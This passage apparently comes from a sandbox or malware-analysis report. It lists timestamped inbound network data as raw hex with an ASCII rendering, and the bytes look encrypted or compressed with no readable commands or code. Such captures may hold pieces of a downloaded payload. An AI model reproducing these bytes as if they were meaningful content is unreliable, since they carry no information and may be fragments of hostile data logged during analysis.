2021-11-25 15:51:58 UTC	983	IN	Data Raw: 19 f6 28 b9 4a 67 92 5d b1 a6 29 a2 c3 09 29 10 a9 a2 69 ac 99 5d ef d8 96 a2 10 e0 c5 5f d7 cf 3c 25 1e 60 94 88 88 8c 2f 0f 87 62 60 9e 3e 80 d4 11 52 b3 07 cb 07 3d 5e 88 65 8b 19 5f 41 c5 5b af 79 db e5 25 f8 2a f1 13 80 c5 a5 27 60 ce 8b 78 61 0b df cb 3c b0 ac ee 6d 0f d2 3a df 80 ce a3 33 4d 2b 0d c6 cb 9b da 39 c1 f8 2a 4f 07 72 8e 3a d4 72 1c b3 b4 63 ea 22 94 5f ec 7d fe 02 20 e6 81 e4 f0 69 05 08 a0 ad bd 95 2c 19 f8 16 ce 1d 10 a3 04 80 74 a7 fd e6 f3 e5 c2 3f a9 58 ed ff 69 0b 96 09 15 c1 bc d2 20 19 2d 2e 35 b2 c4 98 50 18 e7 cd 0f 1b e6 f5 a1 a7 a2 20 fb 6b c7 a0 0f ea 7f 5f a9 bf 8e a9 65 08 ac 91 30 be e2 7b 07 71 96 3d 93 ae f9 1f 07 c0 43 6c ba cf af 29 6a f0 63 30 05 34 a2 c4 b0 60 98 3d 94 5d 83 43 6f 2b 7c e1 f0 94 63 50 c8 83 f3 2e Data Ascii: (Jg]))i]_<%`/b`>R=^e_A[y%'`xa<m:3M+9Or:rc"_} i,t?Xi -.5P k_e0{q=Cl)jc04`=]Co+\|cP.
2021-11-25 15:51:58 UTC	984	IN	Data Raw: af 41 44 e6 7e 38 35 b6 bf ad c2 ab 5e 99 e2 5f e5 35 5b 1a 76 66 c6 b3 c0 dc 58 4c ca 60 6f 0a 29 7f d5 51 90 20 73 bd 9f 45 20 9b 88 69 7e 87 49 77 a7 29 d9 1b 48 ca bf 8c 02 2d 01 f1 06 35 aa 25 8a 66 be e9 41 5c a2 22 e0 31 be e9 f9 a9 d9 cf 69 b9 19 58 7c 94 6b a0 d0 f9 16 53 1f 71 c2 d2 32 ea d0 b6 75 24 01 4c c0 dd ee 80 74 df 35 44 d7 16 48 5f 92 51 31 b5 73 21 11 3d 32 8d e0 64 ec 85 30 5f e1 f6 14 58 07 c8 12 c7 1b f0 ef 0b 5a 9b 9d b0 fc 9c c5 66 d0 4f 7f ca 18 00 eb 76 66 8d 5b 14 ac 37 cc 06 b1 4b cf b0 95 97 2c 2c 12 af 55 f4 f7 fb 2d ae cd 0a 96 a9 c6 0f c7 e4 f6 1c 45 69 0c a0 06 8e 5b 52 68 83 f9 61 1f c6 7c bf d3 03 01 02 51 06 c4 1f f4 24 ef 0c 4a c1 fb 6b 89 e7 bf 67 36 1c e4 d5 1a 49 e2 7f 5f 80 d2 ea 71 58 d8 ab a5 b4 7e 45 a3 47 cd Data Ascii: AD~85^_5[vfXL`o)Q sE i~Iw)H-5%fA\"1iX\|kSq2u$Lt5DH_Q1s!=2d0_XZfOvf[7K,,U-Ei[Rha\|Q$Jkg6I_qX~EG
2021-11-25 15:51:58 UTC	985	IN	Data Raw: 42 7c 71 cf aa 8a fa f7 68 43 53 79 e8 e2 05 93 11 dc 62 6a 4f 02 b3 75 db 72 d5 80 45 27 4d 3e 92 1f 77 3f b3 c0 6d 67 af 73 1b c2 65 1b 17 57 88 75 7e 80 f7 a6 ca 0f c8 1b 15 38 df 5b a2 15 7a 64 20 49 ea 7e e5 c2 26 6b 87 cb ec 43 a0 38 3a 33 1b 4e c0 ed 92 eb a0 a5 be 3e 3c c6 c3 96 6b f5 8a 01 5e 87 63 e3 8f 0e b9 d2 b5 ca be 72 f7 6f c3 2c 13 11 b1 ae ab 6e 65 e5 f7 a7 a3 9d 13 6c 37 45 a7 9c 3a 35 8a 9d 5e 1a 7b f0 6a 4d a6 28 2f b6 f5 75 2e f9 ae f7 99 df b0 3f 93 94 f5 84 4a a7 a8 e6 3d aa 51 f8 03 05 42 57 8f 09 69 c5 dd df 01 8e 88 84 20 8d b8 63 08 a0 3f 21 11 5b 28 8f 70 f6 16 a7 69 04 83 cd e3 7d fe e6 47 66 75 45 51 7c 42 5e 5b 56 55 68 89 de 6f b8 06 5d 4d 7b c1 1f 34 63 99 e6 b3 40 fe 3c 85 f7 f9 6e ab f8 14 f5 9d 18 b9 82 4f c1 fb a5 e7 Data Ascii: B\|qhCSybjOurE'M>w?mgseWu~8[zd I~&kC8:3N><k^cro,nel7E:5^{jM(/u.?J=QBWi c?![(pi}GfuEQ\|B^[VUho]M{4c@<nO
2021-11-25 15:51:58 UTC	987	IN	Data Raw: 97 60 be 5a d6 03 0d 3d 58 90 b2 ff 31 84 68 4f 1f 44 ef 25 da b2 2c 34 ca bf 60 a5 c3 eb 95 06 8d 6f 12 40 d3 2e b0 c6 3f 9e 2f 7b a9 d3 07 dc 60 fe ff cd 8f 92 de 51 17 3b f4 da ae c7 13 be 0c 03 37 80 7e d9 14 fc 3c 4a 29 32 0b 19 c1 a8 d3 8c 69 5a 02 0d 1a 42 d4 0a a8 7c 4c a4 dc f3 d5 2b 99 31 80 96 75 c5 f2 c0 ed f3 d4 79 ec ae fb ec 85 46 d2 82 7d 7e 7a f6 24 70 4b bb d9 29 a1 a0 78 15 3e 2b af a9 a2 16 75 eb f1 63 e9 02 f2 ec 68 10 59 68 b0 4a 70 55 46 e4 38 0e 63 59 7d 38 01 3d 41 2f 75 e2 4e c0 63 4f 90 91 e8 7f 32 19 5c 33 83 03 25 55 e8 9d 50 e7 5c 7e a4 14 5b 1c 76 d8 e5 4a 57 6f 13 6d 04 45 c4 fa 9c c8 7c 4a f5 93 ad c2 c6 0a 41 a2 0e df 30 79 d9 2c 28 1a da f7 4e 61 0a 9f 05 38 d4 55 4e 61 e8 92 12 2a 1b c8 04 ee b8 69 01 3c d5 33 0c 0f d2 Data Ascii: `Z=X1hOD%,4`o@.?/{`Q;7~<J)2iZB\|L+1uyF}~z$pK)x>+uchYhJpUF8cY}8=A/uNcO2\3%UP\~[vJWomE\|JA0y,(Na8UNa*i<3
2021-11-25 15:51:58 UTC	988	IN	Data Raw: 33 64 81 91 73 d9 c0 e5 69 06 a6 c2 bf d4 ac 30 04 ad a4 57 d6 a8 74 a2 0c 40 07 91 97 24 5f 09 c2 bb d9 2b 3c 17 7c a7 5e e7 d2 5b b1 42 e3 c6 03 02 58 d1 20 89 42 d2 b4 f1 50 f9 21 e1 da 44 70 a4 24 53 dc 57 ca 89 85 07 86 45 52 c2 29 95 27 e7 a0 d3 99 89 e4 4b d4 98 8e 21 fd 70 17 f1 d1 36 97 b5 dc 66 97 69 c9 ba fe bd 63 6b c4 7a f8 17 70 93 88 86 5b 81 c8 7c 7a 4d b0 bb de 6d 82 7e 57 99 f4 b2 f3 55 52 e7 28 0d 96 3d 1a 76 3d 58 f5 28 20 dd e7 d5 dc 37 24 67 89 d1 2e f8 02 0b 13 7e 7c 20 8b 8e a5 ab e1 c8 ed 02 a4 85 fb 2a 1a ec 9d 53 69 94 fe 73 8d e4 71 27 a5 19 38 0b 25 4f 72 1f cc 7f 2f 34 3f a7 a9 cd 8a 34 9e da 97 8e bc ec 9b 33 c0 74 4a 26 d0 b2 c8 8f 1b b1 0b a0 07 08 50 09 91 a5 a5 aa 4a 4c 91 d4 f3 ed fe ea 0b 91 90 22 6e 1d c4 97 bd 69 ae Data Ascii: 3dsi0Wt@$_+<\|^[BX BP!Dp$SWER)'K!p6fickzp[\|zMm~WUR(=v=X( 7$g.~\| *Sisq'8%Or/4?43tJ&PJL"ni
2021-11-25 15:51:58 UTC	989	IN	Data Raw: 83 f5 2b ac 43 d9 73 c2 c2 9c 00 73 d3 3c c5 05 a0 8e 80 51 c2 35 07 38 83 cd 88 f8 f4 e1 ca 87 c7 14 0e ee 29 a6 2d 3b 9d 41 d8 f8 f5 6e 94 3a 0b 24 ec 8e f4 00 8e 25 d2 20 1f 0e 02 28 aa 2c e5 dd 2f cd 91 de 02 7b aa 2c 48 d5 bc 9d f4 73 c2 d5 8f 8c da a1 ca 79 cf 9f 27 fd 41 3e da f7 08 46 56 0f bc 01 5d 63 a4 1a 2f 90 ff df 52 a8 32 37 a0 db 99 1d 87 43 29 84 92 6b a5 ae 5c 77 cc 62 86 63 5d e2 4f 1d 0b 20 84 c9 1a 70 e2 f1 03 07 06 01 06 50 03 2d 19 3c 0a ff bb 60 9b 33 dc e7 25 ef d9 8c 6f df 2b c0 6c 48 ab 1c 76 58 d8 23 af c8 6f 53 70 5c 80 82 e5 46 43 a2 7b 5a f8 b3 73 ba d7 cf e3 80 99 74 19 41 ba a2 c4 cd 30 95 72 14 5f f0 95 b0 f0 54 ff 11 1b c1 a5 9d 38 c6 3e 2d 61 ac ac ef cc 72 4e c0 79 31 70 95 b4 f7 9f 4b 60 d4 90 17 c1 92 b5 e1 59 8e e0 Data Ascii: +Css<Q58)-;An:$% (,/{,Hsy'A>FV]c/R27C)k\wbc]O pP-<`3%o+lHvX#oSp\FC{ZstA0r_T8>-arNy1pK`Y
2021-11-25 15:51:58 UTC	991	IN	Data Raw: 6f cb e9 b2 ca 8a 5e 1e e2 0c 7f 89 d7 1f 40 15 66 13 3f b0 90 fd b7 76 de d4 fe d6 fe 3c 2e eb 95 5a 18 58 51 74 21 7a 3c 21 e7 c7 2b 1a a4 60 1d ef 6a 2f 45 48 45 a6 77 41 37 3b 76 40 ac 28 5d 86 6f 80 e7 28 61 81 22 c4 4a 2d 22 cc c8 15 ca da 3c ce ef 05 7f 4e 71 da 0d 16 b1 2a a4 a3 2c 1c 96 36 c2 c6 ae f9 97 6e b1 0e a5 aa e6 41 ce 56 c4 da 5f 1b fc 00 6f 7e 7e 46 e6 b2 2d 5c 9a 07 db c3 12 52 ce 5e 66 18 48 f2 8a 02 b5 42 d4 30 f5 2c 1b 4a fe ad c1 8f 19 96 71 6e a1 a1 49 2f b3 ae d6 01 ca 75 36 9a 99 09 1c 90 e6 c5 2e 07 36 c6 67 d9 a1 29 7a b9 d8 94 30 03 67 ea 78 60 93 6b 29 ad a0 5c 2b 07 a4 a1 ea cf 03 35 be 10 46 e7 35 a2 92 1b 67 92 09 d5 54 14 58 e1 f3 9d ba fb 03 d4 e0 c5 02 6d 3d 35 12 d7 b2 4c 9a e8 24 55 62 7f d9 2d 71 4b e2 d9 9a c2 60 Data Ascii: o^@f?v<.ZXQt!z<!+`j/EHEwA7;v@(]o(a"J-"<Nq*,6nAV_o~~F-\R^fHB0,JqnI/u6.6g)z0gx`k)\+5F5gTXm=5L$Ub-qK`
2021-11-25 15:51:58 UTC	992	IN	Data Raw: d7 2e 83 02 9c 87 fc 30 04 36 95 2d 16 77 f8 85 6a 20 83 b2 53 6a a0 1a 40 b2 2c 52 18 b7 49 f2 9d 17 44 d1 3f 50 0e 68 ba c7 eb 00 06 4c f1 e3 f4 11 2a bd d9 dc 52 cf 3e 2b 4d ec d6 3d 54 4f 46 29 ff 08 34 07 0a d6 05 09 b7 38 ad 5f 13 ed 16 2c 11 4c 50 e1 3e c0 78 c1 f6 a9 60 68 4b 74 67 18 a5 b2 70 33 6c 27 dd 22 bb 52 4e cb d0 50 e8 49 8b fc ab 58 ab 6e 42 e2 99 61 de b4 04 03 33 ba 59 af b7 40 d1 30 0b 8b 6b dc b5 8f 58 e9 f9 94 17 32 37 b9 fb 8e 25 5f 22 9f 39 85 45 52 7e c7 9a 42 5e 92 17 ff 6c d5 14 c7 88 f7 f0 da 3c f1 65 fd 90 0b 38 f2 9b 39 5d 44 31 72 a7 46 56 6f c1 55 df 5d e8 b8 78 bf 62 b5 d4 2e c4 94 99 8d e8 d3 35 0d 21 76 a8 05 3e be 74 fe 81 fd b4 f0 9b a3 a4 a8 cc 9f d8 21 09 76 ab 19 18 71 12 55 ce f4 22 5b 19 2b 7c 2a 21 e2 4e 42 d3 Data Ascii: .06-wj Sj@,RID?PhLR>+M=TOF)48_,LP>x`hKtgp3l'"RNPIXnBa3Y@0kX27%_"9ER~B^l<e89]D1rFVoU]xb.5!v>t!vqU"[+\|!NB
2021-11-25 15:51:58 UTC	993	IN	Data Raw: ec a2 62 16 aa e3 21 98 79 fc 7e 42 42 11 e0 a3 c2 6a 9b 80 fc fe b4 5c 24 37 fe 18 0b 50 c8 3d 06 b9 43 9a 4a 2c f1 13 bf 7b 7c 93 9b 97 45 50 85 36 17 f1 88 4a 19 44 cc 44 0b 05 d3 23 2a 03 fc 64 67 24 3c 4b 4c ea cf ae a3 91 7b 7a d3 40 cd aa 3c d4 94 88 f8 02 62 b3 fa 85 a5 88 53 60 61 6b 7d 4a 32 14 d7 a0 d7 f8 7e d0 07 8d c1 5a d9 d3 d4 f9 a4 48 42 61 d4 f8 34 14 63 64 1e a8 fe cb ef c4 c6 03 29 ba 61 a2 ec 1e e6 2f 92 17 fd 35 4b 89 60 82 e1 e5 c8 ff 9d 10 c9 45 18 b4 7a 86 7b b5 1d eb 5f 83 e3 40 c7 13 ae fe 3a 58 e0 82 88 3e 43 7a 05 0e 42 f4 3e cc 71 ea e0 1d 73 a7 c2 ee b6 ac 46 d3 fb 22 59 3a eb 14 bf e9 93 ff 3e ea 93 94 86 45 8c 86 db 3b 4a 04 1b 06 a2 b6 82 42 42 3e da 65 b4 ce 5e 76 e5 06 01 ea 24 5d 53 9d 7e ac 4a 1e 58 7c 5d 99 ab cf a2 Data Ascii: b!y~BBj\$7P=CJ,{\|EP6JDD#*dg$<KL{z@<bS`ak}J2~ZHBa4cd)a/5K`Ez{_@:X>CzB>qsF"Y:>E;JBB>e^v$]S~JX\|]
2021-11-25 15:51:58 UTC	995	IN	Data Raw: b5 9b 14 94 32 a2 a3 54 44 09 15 6d a5 5c 2c ca 8a db 40 d9 92 c5 20 c0 9e d0 15 16 4c 63 37 d5 11 a8 de 5d 96 1c b0 dc de 36 cb 07 0f 75 26 d1 5b b4 ed 5a d7 88 3f 33 68 f7 60 cf 49 4b 7c 4e 78 c5 9d 14 74 a5 92 12 a5 4e 77 db d8 9f 0c a7 3b bb 8b 6d 05 33 bc e2 79 ea 44 86 64 50 c4 99 78 f2 62 68 00 b0 2b 82 73 64 ff 4a c8 81 2f 76 d3 87 ff 99 86 45 52 fb 09 ae 50 12 1a c9 1a fe aa 45 1a bf f8 20 4b cc 22 69 65 51 a1 91 98 ff 7d 0f 66 8d 5f 13 52 7f 95 a5 bb 57 69 c8 b5 88 07 a4 df d2 14 df 5a b3 e9 29 97 86 9e 06 2c 17 f6 16 d0 2a e5 8b ad 20 12 5b 23 0b 46 e4 b7 14 f0 a6 b3 c7 59 19 0c af 75 32 62 85 02 a8 75 1c 9d 48 fe e7 2f b8 66 07 b0 89 f1 20 75 e2 ab 31 8a 3b 68 6a 81 c2 78 b4 6d 64 3f 02 b0 c7 cf a6 11 33 16 d2 82 8c e9 f6 e2 aa d7 2f e8 fb 00 Data Ascii: 2TDm\,@ Lc7]6u&[Z?3h`IK\|NxtNw;m3yDdPxbh+sdJ/vERPE K"ieQ}f_RWiZ),* [#FYu2buH/f u1;hjxmd?3/
2021-11-25 15:51:58 UTC	996	IN	Data Raw: 97 b2 c5 e4 b4 36 0c 92 22 6a 37 af 5d 74 25 00 cc 61 43 9b 23 5a 3d 44 30 12 f9 a4 b5 16 ab 3a 0c e2 6a 6e 92 1a a9 a6 3a 88 51 e0 18 ef 3d ab 63 f2 d4 a0 d1 a8 b8 77 30 11 59 e7 8a 87 26 6a ba 5f 49 58 a5 c2 33 be 47 54 77 4f 39 4a d1 09 28 e4 0a 4b 52 3f 47 5c 28 ce 3d 56 49 4a 61 34 a1 a9 f7 a0 3c 24 6f be eb ae 29 f7 3a a6 a5 15 ca 37 8e 4e ef 69 3f 93 ed 97 93 73 42 e6 ba 0a 98 6d a6 95 b2 2d 93 9e a6 26 2d 0e c6 63 42 4a d1 4d 82 ae 26 a9 11 17 4d 76 ad 8d e1 4c 46 20 2e e5 97 fe 0f e1 c1 8f 19 56 27 fc bf 14 68 84 77 48 3e da df 25 08 37 83 c0 d7 c8 75 52 fc 0e 59 e8 3a 0b f9 9e 3f 41 e3 51 8e f4 2a 11 eb c1 fb 3a 34 83 6e e9 29 99 bc e4 a5 b1 c2 da 04 7c 4d 4d be cd 49 49 70 9d 59 13 e5 cb e1 f6 21 fc f5 0b 28 17 cb 31 c7 15 20 00 bb 52 c2 98 aa Data Ascii: 6"j7]t%aC#Z=D0:jn:Q=cw0Y&j_IX3GTwO9J(KR?G\(=VIJa4<$o):7Ni?sBm-&-cBJM&MvLF .V'hwH>%7uRY:?AQ*:4n)\|MMIIpY!(1 R
2021-11-25 15:51:58 UTC	997	IN	Data Raw: 1b ac a7 96 3f a3 48 d4 31 74 45 03 0e 51 7e a8 c8 23 e1 20 92 19 3f b2 47 c5 8d 0b 77 54 91 15 53 b1 2b 1b 00 c1 9c 5e de d5 9d 4a 4f 96 08 8a a9 84 19 3d 7c c0 1c 37 4b 08 12 66 80 75 56 7e a8 63 0b d8 4f 3b 29 0c 67 4b 00 ba f9 ac dc b9 67 02 5e f7 93 7f 27 e7 c1 2a 8e e1 3c c9 36 3d a6 ab b5 ed ba 7d 8b ad 50 f8 23 0a 15 f0 92 77 dc a8 63 c3 27 08 5f 7d f2 66 bc 5f 26 6a 83 f5 0d 70 48 1d c3 1b 0f 26 76 5b 19 f4 97 60 b9 12 6b 3b ac 56 ae 82 ad 69 33 79 36 1b fe 3f 92 86 dc e7 7b ba 67 55 db b8 fb 80 a4 43 cc 6f 34 33 65 3c 13 e7 c0 1c 96 93 68 b1 df e1 24 21 e0 52 fe c5 4a 72 68 87 cf 35 4c 39 d5 1e 76 6d a1 2c e1 e3 d6 ad 6e a0 74 4f bd 16 49 b5 50 de 64 8c 5b e4 a1 80 d6 5a 13 83 73 cd 91 e1 74 61 3d a0 32 f6 97 99 04 27 82 8b 8f 94 39 b3 75 e0 2e Data Ascii: ?H1tEQ~# ?GwTS+^JO=\|7KfuV~cO;)gKg^'*<6=}P#wc'_}f_&jpH&v[`k;Vi3y6?{gUCo43e<h$!RJrh5L9vm,ntOIPd[Zsta=2'9u.
2021-11-25 15:51:58 UTC	998	IN	Data Raw: fe f5 2f 8c 8f 59 63 75 3e bb 63 35 bf 9e b9 4d af a9 6c 5a 51 e2 40 97 b9 80 a9 54 51 4b df 5c 00 cd 7a 68 c1 1c 99 93 ab d4 3a b2 3d ec e5 a3 59 38 bb 52 f5 d1 bf 58 1b bf 8f 53 f5 73 7f 3b eb 7f f8 19 fa 9b 4d f4 1c e1 82 5c 12 5b 16 f4 38 04 bb 65 ed 14 63 39 b6 c4 28 2b 1f eb 0d 19 f0 69 34 3d a6 1c 7f 91 b9 a1 a6 18 ad b5 73 24 61 33 65 61 9f 25 1a a6 9a 32 0b 2e 41 43 3e 24 63 e8 6e 35 46 b5 73 c6 29 a1 93 a5 ee 0e d7 25 d8 c3 1e 74 9e 38 ed 0d 27 0b 0b 28 18 4f 40 ad 5d 04 29 64 60 90 1a 4e fa 5e 80 26 60 99 61 1c 47 ab 30 04 5c 74 9a 3c 1b 75 7c 9f 5c 7c 25 4f 7f 48 db 2f ec 49 44 da 9a 49 85 32 07 04 42 33 9f 56 88 e7 28 f4 2c 2b 9b bc 70 2c f5 7d 76 6a 86 7a 0d 27 df e2 4d e0 50 7c b5 16 c2 a9 65 0b 63 d9 f6 65 07 c1 24 2b de ce 88 6e 50 18 78 Data Ascii: /Ycu>c5MlZQ@TQK\zh:=Y8RXSs;M\[8ec9(+i4=s$a3ea%2.AC>$cn5Fs)%t8'(O@])d`N^&`aG0\t<u\|\\|%OH/IDI2B3V(,+p,}vjz'MP\|ece$+nPx
2021-11-25 15:51:58 UTC	1000	IN	Data Raw: 8b 03 3d 76 62 8c 56 8f 7a 40 24 35 c5 8b e1 c8 72 20 17 75 e8 fa 5a 5e 46 d3 3b 5d ab 52 06 4c d5 a0 d9 ca 12 c6 d8 50 6e a1 a5 53 63 d0 49 a0 a2 23 eb c3 e8 64 33 10 a8 50 c8 44 cd fe e4 22 12 5a ed 62 10 b4 8c f3 e1 f6 26 3d 16 8d dc 55 9e 27 e6 8e 7d 4a 21 6c 8a e9 1f 00 e6 4d 7d cd 84 dc a8 2e 5e a6 24 67 4f a7 64 87 f3 07 21 d2 59 d7 1c 43 ff 57 97 39 b4 11 ea c9 ca 71 cc 9b b6 c5 1a c2 dd a7 0e 5e ad bf 72 a0 de 6b e0 e3 7c ac a4 46 da a5 a3 3f e3 22 c7 1d f0 8e f7 90 18 df 25 18 58 d2 b5 4b d4 29 cf de d9 27 de b4 ef d6 7d a4 a5 5b 52 7c 2a 55 64 72 f4 4f 2e f9 71 e4 6b ba 0d 6a 4a 87 c2 96 09 1c f7 0d 90 15 f7 a4 10 bc 10 60 ed f1 e9 51 74 2c 02 5d 17 f4 11 d4 95 c4 8c e9 f9 a6 ec 3e 79 d9 a9 53 7c da 11 ec 34 37 2e 02 b4 1a ac 07 a1 42 a5 98 3f Data Ascii: =vbVz@$5r uZ^F;]RLPnScI#d3PD"Zb&=U'}J!lM}.^$gOd!YCW9q^rk\|F?"%XK)'}[R\|*UdrO.qkjJ`Qt,]>yS\|47.B?
2021-11-25 15:51:58 UTC	1001	IN	Data Raw: 61 00 8e f9 b8 2d ae c7 25 dc 52 e9 62 14 04 cd bc 94 31 6a d9 11 37 d0 0a 3d 4d a2 1e c7 2a 22 65 16 42 45 18 b2 63 07 39 5a 84 4c 2b ff 24 26 9b 47 4c c5 f2 5c 95 39 d5 c9 b7 7d 21 0f d7 a4 c0 19 2a 10 51 4c 44 17 8f 16 fb 7f ea 59 58 dc 6d 7c a6 dc 55 65 ec 16 77 37 d1 97 5a 04 52 f1 14 37 01 0f 56 76 10 4e ff 8a 55 8c 03 00 13 54 b5 88 2c 1a 42 2b 8a 5c 04 3b b5 42 e6 75 db 4f 9d f9 16 53 e8 f1 2b ff 0d ce f1 73 35 a9 a9 b9 19 35 db 41 a4 91 04 27 8a 0f 54 0a e0 ad 1c be 99 81 c5 98 86 8c c1 1e a6 6f f4 7b 1d fb b1 ac 0b 1a 3e 24 db 8f 95 8e 29 75 3f fd 74 44 8e e1 30 55 98 f4 46 34 e1 8c 97 79 d2 54 15 c5 af bc 16 44 29 67 6c 42 3b cc 6f c5 03 df 2f d7 db 2d ca 39 57 9c 6c 4a 32 48 2f 64 a2 de bc 86 8c 83 99 76 a9 4c 2f 6d 5a 57 88 8b f4 f6 ff 9d 57 Data Ascii: a-%Rb1j7=M"eBEc9ZL+$&GL\9}!QLDYXm\|Uew7ZR7VvNUT,B+\;BuOS+s55A'To{>$)u?tD0UF4yTD)glB;o/-9WlJ2H/dvL/mZWW
2021-11-25 15:51:58 UTC	1002	IN	Data Raw: 6c 23 00 cb e8 98 32 ca 97 60 62 09 c2 73 a5 56 06 33 ef eb fb 57 92 b6 e9 3a 06 57 16 5d 4c df 09 1a 76 17 d4 d2 a3 7f cd a7 31 58 e8 65 db e0 1c 24 2f 9c d3 d0 39 51 94 b2 52 ea 23 a3 c6 13 a9 dc bb 2c ff cf c9 07 3f ad df 49 ab e2 7d 55 bb 0f 2f 72 26 1c 1a cc 8d ee 09 fd e2 0f ee 61 5a d2 a6 8a 63 12 1b f3 eb b7 7e 29 27 d9 48 87 cf 32 51 45 4a 6d 04 53 0b c4 86 78 6e 93 9b a5 37 b2 d8 e6 47 6a ff b6 ec d7 19 a4 70 9d 8e 5c af 2c a5 9e 22 3c 2f 8e 40 25 8e ba f0 86 06 59 0a a0 3e 2b a4 3c ba f6 72 ff 85 f8 58 d7 33 37 8d fd c9 0d 17 8e 21 89 4b 39 dd 96 08 99 d3 3e 4e 42 d1 c4 ee 8e 0e 5a ee 6b 00 a2 b2 f2 0e 1c 4d 77 95 b8 e6 e3 c8 95 d8 aa ed bc 94 69 8e 23 f1 ab 50 c1 49 ab 22 86 13 ee 6d 38 c1 7f cd f1 fe 01 ea 45 62 b2 27 61 35 b0 cb e9 1b aa d9 Data Ascii: l#2`bsV3W:W]Lv1Xe$/9QR#,?I}U/r&aZc~)'H2QEJmSxn7Gjp\,"</@%Y>+<rX37!K9>NBZkMwi#PI"m8Eb'a5
2021-11-25 15:51:58 UTC	1004	IN	Data Raw: bc 01 fd b6 fc 66 68 4e c9 e4 bf 67 39 ac 32 eb fb 72 49 7f ce 5e 95 78 cb f2 ce bc 0f 2b ac b2 30 8e 24 6a b5 44 58 71 bc 16 10 dd b0 53 e7 d3 be bd 16 18 75 6f a9 8a f4 ff de d2 2b 69 8a 67 e4 ac 4a 4c a1 5e 59 f5 70 c7 1d f3 d8 aa d9 99 07 d5 1c b6 09 c9 94 ba 35 a6 e7 ce b6 fd 42 85 31 ed 5e 01 e7 6b ee 51 97 19 08 21 d7 88 fd 72 55 f4 d7 33 25 d1 b1 02 01 00 8c 60 b2 0e 53 4b 47 ab 34 07 ef 1c ec d7 f1 07 ca 17 2f 0b 17 51 7d 68 2d 5e 7c c1 ae 97 d4 2d f8 c8 b0 c7 2d 59 78 f6 98 d9 79 3f 45 5a 08 32 d7 b7 42 7e d6 52 12 c6 51 64 2b 92 21 84 97 10 68 a1 29 05 04 a3 50 7d 29 7a c4 9e 2d 67 8e ea fe 90 27 f6 93 14 b5 8d 63 01 63 f6 99 6a 47 c0 d5 30 e0 d6 54 7e db e8 1b 72 3f 35 5a 1e fb 6b cb 83 04 34 9a 40 1b cc ba c6 7e 2e 0e d2 2b 1c e3 d6 1b 7b 5c Data Ascii: fhNg92rI^x+0$jDXqSuo+igJL^Yp5B1^kQ!rU3%`SKG4/Q}h-^\|--Yxy?EZ2B~RQd+!h)P})z-g'ccjG0T~r?5Zk4@~.+{\
2021-11-25 15:51:58 UTC	1005	IN	Data Raw: a8 d1 0a a6 22 63 0e 0a ad 0b 4a 88 68 87 ed 00 be df c5 d5 1b f3 c2 0c 98 02 d6 80 d0 be dc 56 e9 c1 79 37 b8 c2 99 bd 65 16 14 56 fe 55 66 88 7f 30 f9 ae fc 1d 72 91 ac c1 34 94 35 be ef d0 8d fc d4 a9 4e b5 02 8c 49 70 ad 6b 3b ac 36 2d a9 b1 d2 b1 b6 92 1d 18 f7 e2 cb ff 84 75 62 23 e5 a2 bf 69 d0 5c 18 49 48 f5 9e 0f cd 33 70 d8 22 5a e6 75 db ea 21 8a 3a 05 0b 72 99 96 e0 5c 66 72 a9 50 41 e4 41 37 6e ac 38 59 57 56 e9 c4 98 3a 53 ab 29 7c b9 4e f3 de 52 cd 1f a8 d4 cb 43 61 33 94 e1 4f 8e f3 e8 4e 54 67 06 df 44 ef e4 56 08 a4 c2 66 02 b3 42 d3 0d 40 6f 14 6c 51 7a 5e 94 34 03 cd f1 1a 79 2b 70 a9 54 b6 13 94 36 eb 96 85 e2 7d c7 9b 5b 45 d0 d9 7b c8 16 da 51 30 97 73 85 fc cb 1a ae f6 ba 08 40 cf 0b c1 9a 3a ca b7 ae 70 a5 59 06 46 88 66 8b b7 e8 Data Ascii: "cJhVy7eVUf0r45NIpk;6-ub#i\IH3p"Zu!:r\frPAA7n8YWV:S)\|NRCa3ONTgDVfB@olQz^4y+pT6}[E{Q0s@:pYFf
2021-11-25 15:51:58 UTC	1006	IN	Data Raw: 0e 38 32 03 2e b1 bb 53 93 c2 30 c2 74 29 ac 69 04 5f f6 16 db 59 3f 4a c8 b5 79 22 84 4a 30 98 d8 48 ae fc 89 aa 36 08 af 76 bd 9f b1 d6 f6 cb 04 80 44 22 74 9e 0f b9 d2 52 cc 09 a5 29 7e 1c f9 f3 d8 a1 06 05 aa 3c 7e bc 1a 48 2f d5 1e 87 9c 9c 0d df 97 0b 43 e2 74 9a 01 35 33 7d 23 e4 c3 54 6d a9 53 49 a3 54 cb e4 54 c7 eb 90 aa 01 ad 68 b2 f3 e6 c5 ec 8a 34 80 17 f2 e6 4f 72 4b ab 61 eb 65 44 5c 61 f3 df 5a 4c f3 69 66 28 5d 11 d0 6d 24 85 e0 c8 68 df d2 9b a0 de 42 22 3b 3a 2a e8 9d 8f 37 b7 80 ca be 64 32 0f 54 b6 77 8f 9e 3a e7 d8 5e f5 96 f1 83 fd b9 18 a6 44 25 a7 20 66 4e f3 1d 65 e5 9f 5b f6 17 3c 7e 73 bf 9f 13 52 70 26 84 91 da 23 ab 74 30 0b 1c 9a 81 f6 91 0c 5e 71 18 d2 e9 da 33 85 f2 99 70 91 78 af 4d cd f2 e9 a5 22 ce 87 7a 0f cb 41 62 83 Data Ascii: 82.S0t)i_Y?Jy"J0H6vD"tR)~<~H/Ct53}#TmSITTh4OrKaeD\aZLif(]m$hB";:*7d2Tw:^D% fNe[<~sRp&#t0^q3pxM"zAb
2021-11-25 15:51:58 UTC	1008	IN	Data Raw: 22 f8 96 fb 73 dd ea 79 e5 57 ed a5 fe 3c 2e 30 e1 2f aa e4 49 48 38 2a dd 2d 8e a7 df 09 ef 44 da 40 c3 d1 1b c7 1d fb 79 32 62 25 b3 a0 20 b6 8d da 99 b5 f5 c3 08 a3 94 00 70 b7 7a cd e9 de ab 5d 1a 7a db 5a b1 5a d7 17 f3 11 3e ce 5c 96 0f da 55 7f fb 15 88 7b cf 0b 2e f4 f2 94 32 3c 1a cc dd fe 0b 18 49 b3 ca fc e1 82 fb 89 ee 27 21 a8 d4 93 19 32 f7 66 b0 ce 89 7c a4 d4 80 d6 ed da a2 23 e6 a5 39 83 6b 76 cf 08 97 be 00 68 cd 9d 40 c9 f2 63 35 b2 42 5a b0 64 82 46 d0 55 f7 a9 a0 53 bb b6 fd 71 76 fb 0e be 00 be 01 66 6a b4 fd bf 84 3c f2 0d d0 5e 90 fd bf 1b 9b b9 ec 26 ab 51 7a 5f f2 00 b1 ab 4e 54 61 f2 51 a5 01 3c 29 ac ce 22 ef a3 0c a6 2d 92 f1 f7 ad be f3 48 96 b9 80 41 a3 48 fa bd 